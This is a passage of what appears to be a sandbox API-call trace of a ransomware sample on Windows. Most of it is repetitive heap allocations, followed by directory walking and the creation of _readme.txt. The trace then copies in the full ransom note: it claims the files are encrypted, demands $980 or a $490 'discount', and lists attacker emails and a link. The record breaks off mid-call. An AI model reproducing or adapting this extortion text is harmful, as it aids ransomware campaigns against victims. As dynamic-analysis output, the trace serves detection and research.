RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.678] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0228.678] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd450 | out: hHeap=0x620000) returned 1 [0228.678] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.678] PathFindFileNameW (pszPath="") returned="" [0228.678] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.679] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.679] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.679] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.679] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0228.679] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0228.680] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.680] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is 